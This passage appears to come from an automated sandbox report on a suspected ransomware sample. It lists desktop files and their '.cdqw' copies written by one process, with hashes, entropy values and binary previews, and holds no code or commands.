                                                                                                                                                  Preview:JDSOXj...e.#9M..Vg....va.,4.1m.......L.........L\..D....er....@..L..H..>A2..........<)A....n.\...A.Oj....C..._tk.*. ...0.HG......v#f(.8"!T.=....$=......q`...!...b...?"..I.dz.....:....k.......X.q.R.`i.x.*.a/.~.....@Ej[....J/.AT.-..%yB...vu...}.6AT......7..p*.<#6k.\F..=.#8.PV`....Cpf.. 6.S...T......(.=..........TB......F..}ok..fm.@..dF.L&.#vpH6.....vD....[.&.H.0......\.q>..L..=.;..~.] .%.S.....~..!..>...a/wB..O.....Z..r..ac...,.t...pK...F!.....~...7..xv.XBYrh.M@.f.5W.......#......:..3.....O..(.sA.>....T..3.g}z.#$;."..7..c....A.s....~....#?.05.-.`Jp...... .Y.......Z..d....g...2l.(k.i....w.G$....X.,.i......2/Y..O..i...)...4.nI>Y~.NX.6uV..>..^.C...j5.9....#.V...1.K.W.....i..Q...k.......%..5=9.v6V....R...^..`..Ix.0@r.T\..a..z.........k)`T...!.#..VE>!..~}.M.q.MX&..Z.....$jo..RU.gm...i......p.+.cF..pj?.........../NL.t8.....%~v.i........$.<.!.+.l.k.U.....nqS....R.I.2.W-a:.T."..l.k.j..Bb..P@.o..J#.Z.l..F..i.bpf...{v.%0......Q...[h.^.......4z$..

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.867065887183618
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:IUSDJ2Qx80u1h1+59r9jHzD9MGcNPdOS3TJkj7CmrAzYQahZS9m8C2bD:ZSDv6vhw9r93D9MGcJd3cumrAraho80D
                                                                                                                                                  MD5:F153513AFC213764475027DD9FF8B62E
                                                                                                                                                  SHA1:89892350E81935DA3FFBE36706C0A73EA97D2993
                                                                                                                                                  SHA-256:682255316797A95AA7F3626B81A341333C240499810512F78B6818F4230A3D65
                                                                                                                                                  SHA-512:AEA6250C7FEE8310314B3CCE488DA8A89042C76ECF8400E1511172962E20537F671DE33F815E19F3BF94F519E2D97256417ABB9AF3B1FB76401676FEEA5C1D2E
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOXj...e.#9M..Vg....va.,4.1m.......L.........L\..D....er....@..L..H..>A2..........<)A....n.\...A.Oj....C..._tk.*. ...0.HG......v#f(.8"!T.=....$=......q`...!...b...?"..I.dz.....:....k.......X.q.R.`i.x.*.a/.~.....@Ej[....J/.AT.-..%yB...vu...}.6AT......7..p*.<#6k.\F..=.#8.PV`....Cpf.. 6.S...T......(.=..........TB......F..}ok..fm.@..dF.L&.#vpH6.....vD....[.&.H.0......\.q>..L..=.;..~.] .%.S.....~..!..>...a/wB..O.....Z..r..ac...,.t...pK...F!.....~...7..xv.XBYrh.M@.f.5W.......#......:..3.....O..(.sA.>....T..3.g}z.#$;."..7..c....A.s....~....#?.05.-.`Jp...... .Y.......Z..d....g...2l.(k.i....w.G$....X.,.i......2/Y..O..i...)...4.nI>Y~.NX.6uV..>..^.C...j5.9....#.V...1.K.W.....i..Q...k.......%..5=9.v6V....R...^..`..Ix.0@r.T\..a..z.........k)`T...!.#..VE>!..~}.M.q.MX&..Z.....$jo..RU.gm...i......p.+.cF..pj?.........../NL.t8.....%~v.i........$.<.!.+.l.k.U.....nqS....R.I.2.W-a:.T."..l.k.j..Bb..P@.o..J#.Z.l..F..i.bpf...{v.%0......Q...[h.^.......4z$..

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\JDSOXXXWOA.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8671414016853305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:noi1XAnJBuh2dD7deUuhZQQCbYkVx3gKeErtBzsiW/SHnjo2bD:oi1QJEQDdomQJkVZg9EdEKnfD
                                                                                                                                                  MD5:EAE9DBEA766FD332EC7904B372959F9A
                                                                                                                                                  SHA1:F385E4566FEB4C657E925BAD19E7812BABD1E484
                                                                                                                                                  SHA-256:7F28BCE755693D922031C43E4FB99120C260D96653AD82493DAEA14F229A127A
                                                                                                                                                  SHA-512:6A62F84A1FE0B078B821FEC71FE55494AC43C8A84D561D5AC2D6F21673E205F8E917B5EAEC407CC08A4D35FCFF2E5AEE922210C0CF44ACF2305B46B9577D3D7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOX6..f7..S..,;..G.4....d."ys.b..._.:...<...'....7.b..)....S..uw...@.....&7i....O...x.N.T......A._..R....J`...T2.e.....7.GeVn... ...9ie....|.'0.]Rg....BO.NW/.>.\..5.....7.....#..-+F........{.......4..)....6zwI..]R}.N.;..q4f..}......o.!.....4...%y....NY.e....xx#.{x..{!.q..Lr$|..*+...q..GE~.......|......o.&w....jl..?94...%fE....,...w.{.'...V...x(.85+...&J?....,Z.R...Gb_.Q...G.RW.-Q....[h....Q.2...TF.D....&.Q.....O.6C.@@0...D]$.&..\.E.YL..)/..y.zX.<.r.c.#.O....$.E*0`6..>....5o..e.Y.7.....!.s.]a1/~5.h...%..m_...KE{.p.z....j...".X.^4.@...=A]..6..#......"".]..|.QT.w.M......;.~4.y.....K.......m.kX.7Y..!E.KR..A...k.....<.......xy..Y..>U;....g.}c..s.....T...+.mK.qxM.>..\..95.. C..$(..K...'...%......<{G3!R ..jQ;`..`..7.5..g...)..nAX..<../.}l...!Qt.c.w.-Ay.(m..k..y.6...x*.?.....^.p..e../...#Gc.X..~....;..[..-.Ab|.......c...d......TIG|.k.o.ZL.4.r.i..............XV.jX..i..b.Q...T.=..94...o..~0.s.sH.._.....j.e....@.c9...e.......z.....Z2.,..v..Gn.l..A...

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\JDSOXXXWOA.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8671414016853305
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:noi1XAnJBuh2dD7deUuhZQQCbYkVx3gKeErtBzsiW/SHnjo2bD:oi1QJEQDdomQJkVZg9EdEKnfD
                                                                                                                                                  MD5:EAE9DBEA766FD332EC7904B372959F9A
                                                                                                                                                  SHA1:F385E4566FEB4C657E925BAD19E7812BABD1E484
                                                                                                                                                  SHA-256:7F28BCE755693D922031C43E4FB99120C260D96653AD82493DAEA14F229A127A
                                                                                                                                                  SHA-512:6A62F84A1FE0B078B821FEC71FE55494AC43C8A84D561D5AC2D6F21673E205F8E917B5EAEC407CC08A4D35FCFF2E5AEE922210C0CF44ACF2305B46B9577D3D7B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JDSOX6..f7..S..,;..G.4....d."ys.b..._.:...<...'....7.b..)....S..uw...@.....&7i....O...x.N.T......A._..R....J`...T2.e.....7.GeVn... ...9ie....|.'0.]Rg....BO.NW/.>.\..5.....7.....#..-+F........{.......4..)....6zwI..]R}.N.;..q4f..}......o.!.....4...%y....NY.e....xx#.{x..{!.q..Lr$|..*+...q..GE~.......|......o.&w....jl..?94...%fE....,...w.{.'...V...x(.85+...&J?....,Z.R...Gb_.Q...G.RW.-Q....[h....Q.2...TF.D....&.Q.....O.6C.@@0...D]$.&..\.E.YL..)/..y.zX.<.r.c.#.O....$.E*0`6..>....5o..e.Y.7.....!.s.]a1/~5.h...%..m_...KE{.p.z....j...".X.^4.@...=A]..6..#......"".]..|.QT.w.M......;.~4.y.....K.......m.kX.7Y..!E.KR..A...k.....<.......xy..Y..>U;....g.}c..s.....T...+.mK.qxM.>..\..95.. C..$(..K...'...%......<{G3!R ..jQ;`..`..7.5..g...)..nAX..<../.}l...!Qt.c.w.-Ay.(m..k..y.6...x*.?.....^.p..e../...#Gc.X..~....;..[..-.Ab|.......c...d......TIG|.k.o.ZL.4.r.i..............XV.jX..i..b.Q...T.=..94...o..~0.s.sH.._.....j.e....@.c9...e.......z.....Z2.,..v..Gn.l..A...

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\MQAWXUYAIK.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.849877378874669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Q9Jlglcor4U0wNMZVcsKdxoGPii1K6OsLU/12xDZm5d6C3TfjGknxV52bD:ColcU4U0wmZ1GxxpLE12xDZQJ3LjLVSD
                                                                                                                                                  MD5:93674A5C5427B660ABB9C46C3BF2982B
                                                                                                                                                  SHA1:DC23CA21969CDD84A6AD332C3603257A2F249F4A
                                                                                                                                                  SHA-256:82F15DB17E4528181BAE16F431A820BF6A1B1243740B5082F26351307CE9EAD4
                                                                                                                                                  SHA-512:0790471C7D2754C50B47C3667A69105DF343982DE299DA67AA49720B51B43C687C1A3277ED44EEF3E8E8C18684D5BC1DA7AFE67D985AB00672ED021989A1E6B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX..Kx.Ew..D1.*..r.;..j....8...c."...4;}....)/...+..3.t.K........V2~.A.y.N..C.@F.P..;*K.....1..t...[.25.-.p....Yf....uC...%D..J.n..K...b..%J.jH.rS.R,.......U.>....]P}.....E..G..`!......n_....Z.3B._"..o.....I#:Hz 'X..a....d.C...2.@....I.V....m.z{UV..m....R....]....@.lvh.,....V..\.(..+)..Wu..a^xc.....TDD.A9..8.I}.....)f..\..O..D/.Xp...,.1.c...............|........tJu}O...<.........|....W...!u.W,....7p<.8......i.D.._...*b.fW9..;_E.Sj.}.......:."{.\R.......nWi>*x.cn.`C...gM....X........y..%.}'YU.t:.....H.....Ex+..Y..O.,t.V..;..).w.....l.7I..{:..+..2H.....?.i.+...G.h/..Rq..qf.K[........./\....p.E.....^.....;M..Js.oz.......C2..."P......sIg.....D.k.v{.....E+..F.......tf',..$.......h...l...aTC.....+I.x.OL.0{1....,F./..w.>S.`.t.......L..X...?G..4#....i....h..v.. ..m.#.+DC.....m8..-?.../Y.5.....V).#..H.........k../h...Rx., ....U.+..6s....t..V.Q....A..F..&.8.q].. ..O8Q...B..8*6....!.].>.[.:.#......h....4.$..t.A...&..h_..G.w...z`...F.. (

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\MQAWXUYAIK.pdf.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.849877378874669
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:Q9Jlglcor4U0wNMZVcsKdxoGPii1K6OsLU/12xDZm5d6C3TfjGknxV52bD:ColcU4U0wmZ1GxxpLE12xDZQJ3LjLVSD
                                                                                                                                                  MD5:93674A5C5427B660ABB9C46C3BF2982B
                                                                                                                                                  SHA1:DC23CA21969CDD84A6AD332C3603257A2F249F4A
                                                                                                                                                  SHA-256:82F15DB17E4528181BAE16F431A820BF6A1B1243740B5082F26351307CE9EAD4
                                                                                                                                                  SHA-512:0790471C7D2754C50B47C3667A69105DF343982DE299DA67AA49720B51B43C687C1A3277ED44EEF3E8E8C18684D5BC1DA7AFE67D985AB00672ED021989A1E6B9
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:MQAWX..Kx.Ew..D1.*..r.;..j....8...c."...4;}....)/...+..3.t.K........V2~.A.y.N..C.@F.P..;*K.....1..t...[.25.-.p....Yf....uC...%D..J.n..K...b..%J.jH.rS.R,.......U.>....]P}.....E..G..`!......n_....Z.3B._"..o.....I#:Hz 'X..a....d.C...2.@....I.V....m.z{UV..m....R....]....@.lvh.,....V..\.(..+)..Wu..a^xc.....TDD.A9..8.I}.....)f..\..O..D/.Xp...,.1.c...............|........tJu}O...<.........|....W...!u.W,....7p<.8......i.D.._...*b.fW9..;_E.Sj.}.......:."{.\R.......nWi>*x.cn.`C...gM....X........y..%.}'YU.t:.....H.....Ex+..Y..O.,t.V..;..).w.....l.7I..{:..+..2H.....?.i.+...G.h/..Rq..qf.K[........./\....p.E.....^.....;M..Js.oz.......C2..."P......sIg.....D.k.v{.....E+..F.......tf',..$.......h...l...aTC.....+I.x.OL.0{1....,F./..w.>S.`.t.......L..X...?G..4#....i....h..v.. ..m.#.+DC.....m8..-?.../Y.5.....V).#..H.........k../h...Rx., ....U.+..6s....t..V.Q....A..F..&.8.q].. ..O8Q...B..8*6....!.].>.[.:.#......h....4.$..t.A...&..h_..G.w...z`...F.. (

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\TQDGENUHWP.mp3

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8280620333572255
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8w4I/8pARBxJiCijbnC9u0HiTqHm4BI2l1kCAPqzysiPPn2bD:8nIkpAR7Jio91+xfYyRiXiPsD
                                                                                                                                                  MD5:A283FAACF0273E09BA361F3FCDF2736F
                                                                                                                                                  SHA1:44EE5C6E39D56C4F88FAA04A652DAC84ADE78CF4
                                                                                                                                                  SHA-256:282553C311B2190280985A48F59606E39184FF9A72A64F27C86DC11317721DDB
                                                                                                                                                  SHA-512:0CAF7E2045A5FE96E593A650DBA3CD1769C547E7D00FCDD9018CE4751AD2B829491A645B6670692F3B02F0331ACB029D5A25EB88AB89A10DDA1E0F9358C6146C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.u.lc.o..g^p...eX.u.n.G.O..Q......R.z....R.x:.Aq<s.....nV\H'.qI=m..j..7.a....A...`..}..A..r.^D.{mb..}:.......z.Ldpgk.....s.4}y.2..S...?i...1..K:....&..y.cU.\.....M..&Bu....d{I.jF.\..7E..j.Lr.7...Z..wsu...7....8.?]......j...w...k....\..x(.8.Az...E?.NKOr.Y..,..p5...C.q...j....pf...cA....^S....[$<.S.:.iG. }....j....C.Y.]....X$4...;.....X|..p3...!p6-I.U.T|..w.4.. ....[Jp...?.s^.M..}|.............QK2us.1.b..d....c..3,.X......,..k.<.4.w..%..G.p..4.{6..:7.~E.~...%^Q..y.-e.`d..F.......V.....{`/R..3..x."...o...q..0[.......f.'.5_C...c...i....GK...Y.G+..@R.fH.\..^.........["."...5.bwWr....P..e..!.>.F....&\.=....qh.7...{J.&......v.....K.wP.f....|m.0.V.....:..A.h.....,F.e.}x...Y.1]....6|Kb..m............._x...,.1..C./.(..n%...._......Z...3.y,.E.5.J..k.r....&s..,.. .......m...I-...B5K..;8..!..*`;..h....P.I5N..\_..i...7...A.]C.U..T.H..............-(>..r..p8Yw...L...).}...j...E...5..Yv.=.m...@'..y...fk....z..2.B..~.0.....V...O..?lA.P4.0C.J

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\TQDGENUHWP.mp3.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.8280620333572255
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:8w4I/8pARBxJiCijbnC9u0HiTqHm4BI2l1kCAPqzysiPPn2bD:8nIkpAR7Jio91+xfYyRiXiPsD
                                                                                                                                                  MD5:A283FAACF0273E09BA361F3FCDF2736F
                                                                                                                                                  SHA1:44EE5C6E39D56C4F88FAA04A652DAC84ADE78CF4
                                                                                                                                                  SHA-256:282553C311B2190280985A48F59606E39184FF9A72A64F27C86DC11317721DDB
                                                                                                                                                  SHA-512:0CAF7E2045A5FE96E593A650DBA3CD1769C547E7D00FCDD9018CE4751AD2B829491A645B6670692F3B02F0331ACB029D5A25EB88AB89A10DDA1E0F9358C6146C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TQDGE.u.lc.o..g^p...eX.u.n.G.O..Q......R.z....R.x:.Aq<s.....nV\H'.qI=m..j..7.a....A...`..}..A..r.^D.{mb..}:.......z.Ldpgk.....s.4}y.2..S...?i...1..K:....&..y.cU.\.....M..&Bu....d{I.jF.\..7E..j.Lr.7...Z..wsu...7....8.?]......j...w...k....\..x(.8.Az...E?.NKOr.Y..,..p5...C.q...j....pf...cA....^S....[$<.S.:.iG. }....j....C.Y.]....X$4...;.....X|..p3...!p6-I.U.T|..w.4.. ....[Jp...?.s^.M..}|.............QK2us.1.b..d....c..3,.X......,..k.<.4.w..%..G.p..4.{6..:7.~E.~...%^Q..y.-e.`d..F.......V.....{`/R..3..x."...o...q..0[.......f.'.5_C...c...i....GK...Y.G+..@R.fH.\..^.........["."...5.bwWr....P..e..!.>.F....&\.=....qh.7...{J.&......v.....K.wP.f....|m.0.V.....:..A.h.....,F.e.}x...Y.1]....6|Kb..m............._x...,.1..C./.(..n%...._......Z...3.y,.E.5.J..k.r....&s..,.. .......m...I-...B5K..;8..!..*`;..h....P.I5N..\_..i...7...A.]C.U..T.H..............-(>..r..p8Yw...L...).}...j...E...5..Yv.=.m...@'..y...fk....z..2.B..~.0.....V...O..?lA.P4.0C.J

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\TTCBKWZYOC.xlsx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843343164146047
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FhUxEGsxPsns+mcoRbkwgeq/at4nc3Z7uALnjCG4CmXf2YImYt1dH2Iv42bD:F2eTsNzoUequKcZ7uccf/QDD
                                                                                                                                                  MD5:D1A62C98D3E1F06A03841425EEE9521C
                                                                                                                                                  SHA1:E7EB3C772A562A8FABB798FFE6FCA8441EA63078
                                                                                                                                                  SHA-256:D0FB09619C4423B6AB4209C4D6C4442E926BF0C858D69A4051BF16A8AFC50CEA
                                                                                                                                                  SHA-512:2B5BA92A99D43862174521E82EC13B8B7A2316AA0E5281C42052C755E11CFCA0D47DCB191A7EAD848692440FD4478106424BF5BE640A1029861997CAC7CB61AC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..A....J.....$..4y..lCK~.W..0..~8.?NH....+..t...>?qU.S.ar...);.P[px.....|.B.....c.......y......g.S~].S"...,U.D.I.!488...Z.<@n.i=..Y..H....-.6..s0.....?.....8#dF.T.....a..9.U..g.y/.Xb(.B;y...@..b2.0!..4k.!..'.c..x.(..g.....*..@}...?0.....-.%.<r].....c..Ol....}m......C.u.un.`...%3..O./.......%.%.bb.......].w..Y.2..YF,.......g..!.S:.........(.1."...t.@..+Wa.h.%i\.`.I..,b`............W;..l....Y6.E.x}..10~k..qk.....i<...1i.J+.zb...w........_.|.'....7.#...KCr...UNq.HR.>".6at./....*.. m.c<Di...rZ%...X..=...,...z.j.T=.`.t..)q.O.~..c../ ....dfl...A7..,l5|..K./...d."....+.m....S....z....`;W.)..W7X...N.u|DE..y7z#.')..X.....+..9u...DM#U.....I."..A.......:...E... .34:..}.w=...R......f....Y....z:..-Im.._6.....2.o.}&.i........6P.....W.....\".....}{.P7...6..a.$..b..l...........A......]1...y.y:....6..X.(.V.........>..8^........M.h.y!....&..3a...R.;./....@s...P..5:..3.T\...7/.\3$t p\...2*.K...9.i..o.&......3..6..~+.l.........a-.~!"w....y..M*.mr.|

                                                                                                                                                  C:\Users\user\Desktop\JDSOXXXWOA\TTCBKWZYOC.xlsx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843343164146047
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FhUxEGsxPsns+mcoRbkwgeq/at4nc3Z7uALnjCG4CmXf2YImYt1dH2Iv42bD:F2eTsNzoUequKcZ7uccf/QDD
                                                                                                                                                  MD5:D1A62C98D3E1F06A03841425EEE9521C
                                                                                                                                                  SHA1:E7EB3C772A562A8FABB798FFE6FCA8441EA63078
                                                                                                                                                  SHA-256:D0FB09619C4423B6AB4209C4D6C4442E926BF0C858D69A4051BF16A8AFC50CEA
                                                                                                                                                  SHA-512:2B5BA92A99D43862174521E82EC13B8B7A2316AA0E5281C42052C755E11CFCA0D47DCB191A7EAD848692440FD4478106424BF5BE640A1029861997CAC7CB61AC
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:TTCBK..A....J.....$..4y..lCK~.W..0..~8.?NH....+..t...>?qU.S.ar...);.P[px.....|.B.....c.......y......g.S~].S"...,U.D.I.!488...Z.<@n.i=..Y..H....-.6..s0.....?.....8#dF.T.....a..9.U..g.y/.Xb(.B;y...@..b2.0!..4k.!..'.c..x.(..g.....*..@}...?0.....-.%.<r].....c..Ol....}m......C.u.un.`...%3..O./.......%.%.bb.......].w..Y.2..YF,.......g..!.S:.........(.1."...t.@..+Wa.h.%i\.`.I..,b`............W;..l....Y6.E.x}..10~k..qk.....i<...1i.J+.zb...w........_.|.'....7.#...KCr...UNq.HR.>".6at./....*.. m.c<Di...rZ%...X..=...,...z.j.T=.`.t..)q.O.~..c../ ....dfl...A7..,l5|..K./...d."....+.m....S....z....`;W.)..W7X...N.u|DE..y7z#.')..X.....+..9u...DM#U.....I."..A.......:...E... .34:..}.w=...R......f....Y....z:..-Im.._6.....2.o.}&.i........6P.....W.....\".....}{.P7...6..a.$..b..l...........A......]1...y.y:....6..X.(.V.........>..8^........M.h.y!....&..3a...R.;./....@s...P..5:..3.T\...7/.\3$t p\...2*.K...9.i..o.&......3..6..~+.l.........a-.~!"w....y..M*.mr.|

                                                                                                                                                  C:\Users\user\Desktop\JPEAFKFPZY.docx

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843249998272367
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1jhl741uO0XeUrI/nXxGUsuyIVOBS1c6tzy/SRCUQT2bD:1X741uX8XxlyEi6tm/SR/D
                                                                                                                                                  MD5:7731FFB9C6E99661F3846BAF8E7C2E2D
                                                                                                                                                  SHA1:64D51EF0468F5DC6BE27FEBEAAF8D68C9DB3BA51
                                                                                                                                                  SHA-256:3F89DF279223C0C41FB48008F1526B2F35EDF72231A42CA2280695E06BEC615C
                                                                                                                                                  SHA-512:22747D4F37354041A3CF2B47CE931DC0C4BBBC72DB44E5C08A9604164118F81F80C5B702AC2C41A1E96525D7F3B4F63321FE544DAC26BAE1216C2EDEC730C2F3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JPEAF..N...A.w...l..I..y.T.C...,..Vp.w...juL.y.v.?..^.S...}......}.|.]W..M<I.S~./....f.A........%....tFw\.D.I.....A=j..z6.% ..7#... .0....r..........R..#+*..c.V.4.Vq...b!...9md....)n..X.Mxz...........]...S8du...w*...o.8.........a......;bm.j.&)....l.p.....L.&.....!....HM.c.R...$V.......Y;U\......x......!.4Hj. CQ........>Fl.n...[34JmUcy~.f.....H....O....X6wu/.D..l.V.d'k..h.......7H...>>&.G+|p.\,[......i8qh.DU."9.a.'..~aw.../vwO.nk_.e...1....;...=...~u....-. wc..'f^....K.....Td.?Ar.X.#i.......%.,...F.>.,q.h......+?.@..B..Vz<Z......T.]....PJI...C:.v3.^...@....N.O_&....M0._....a..S...m:.d.v....c^.k.$..U..[..b.FS.s.0*.pm....d....)/.".FH.74t..."+...D..L.....5.~..;... .f .3.u..tq&.z..$<v&.....p.$.......}.Scx~....oY}.9sTYg.t.w...w.."....,.....i..<.e8h.pjL..-.2Q...$Yl..Y..C.......*.$..p..5f....^..1...LW..........1...:.PV.y......x.B8.,.8-.G5..}.r..k.l..b.V...p....YyX.;G .$@.w...N...g\..XN.............R...v'f..]C.Y.=5.x.........?6J.f..

                                                                                                                                                  C:\Users\user\Desktop\JPEAFKFPZY.docx.cdqw (copy)

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843249998272367
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1jhl741uO0XeUrI/nXxGUsuyIVOBS1c6tzy/SRCUQT2bD:1X741uX8XxlyEi6tm/SR/D
                                                                                                                                                  MD5:7731FFB9C6E99661F3846BAF8E7C2E2D
                                                                                                                                                  SHA1:64D51EF0468F5DC6BE27FEBEAAF8D68C9DB3BA51
                                                                                                                                                  SHA-256:3F89DF279223C0C41FB48008F1526B2F35EDF72231A42CA2280695E06BEC615C
                                                                                                                                                  SHA-512:22747D4F37354041A3CF2B47CE931DC0C4BBBC72DB44E5C08A9604164118F81F80C5B702AC2C41A1E96525D7F3B4F63321FE544DAC26BAE1216C2EDEC730C2F3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:JPEAF..N...A.w...l..I..y.T.C...,..Vp.w...juL.y.v.?..^.S...}......}.|.]W..M<I.S~./....f.A........%....tFw\.D.I.....A=j..z6.% ..7#... .0....r..........R..#+*..c.V.4.Vq...b!...9md....)n..X.Mxz...........]...S8du...w*...o.8.........a......;bm.j.&)....l.p.....L.&.....!....HM.c.R...$V.......Y;U\......x......!.4Hj. CQ........>Fl.n...[34JmUcy~.f.....H....O....X6wu/.D..l.V.d'k..h.......7H...>>&.G+|p.\,[......i8qh.DU."9.a.'..~aw.../vwO.nk_.e...1....;...=...~u....-. wc..'f^....K.....Td.?Ar.X.#i.......%.,...F.>.,q.h......+?.@..B..Vz<Z......T.]....PJI...C:.v3.^...@....N.O_&....M0._....a..S...m:.d.v....c^.k.$..U..[..b.FS.s.0*.pm....d....)/.".FH.74t..."+...D..L.....5.~..;... .f .3.u..tq&.z..$<v&.....p.$.......}.Scx~....oY}.9sTYg.t.w...w.."....,.....i..<.e8h.pjL..-.2Q...$Yl..Y..C.......*.$..p..5f....^..1...LW..........1...:.PV.y......x.B8.,.8-.G5..}.r..k.l..b.V...p....YyX.;G .$@.w...N...g\..XN.............R...v'f..]C.Y.=5.x.........?6J.f..

                                                                                                                                                  C:\Users\user\Desktop\JPEAFKFPZY\JDSOXXXWOA.pdf

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1360
                                                                                                                                                  Entropy (8bit):7.843091886645962
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SlXEMYuOE+JsU7VJ5YRYzeuXObzEC1Fkr5F2/JbxMg+9ce+2Fd5dS6K2bD:SlXEMYuH+Jd7VzYqzRXmbPN+9ckFd57p
                                                                                                                                                  MD5:777B3D661D557CC4736C1231D4151286
                                                                                                                                                  SHA1:65D3BCF6770817A219EE69FB11A5C95178609A0D
                                                                                                                                                  SHA-256:68717287D6D453011D8F01A3575367F28983485511201B047B57522E8F48DA20
                                                                                                                                                  SHA-512:88F7BE86A4203910FB62F16166D607DFDB865FBBEEBE54A3C70D6A67FF9493AC93F12460CF8675B6D898C7E69CD6720E4F85DECC2B4557D70A3C98D87B643FDE
                                                                                                                                                  Malicious:false
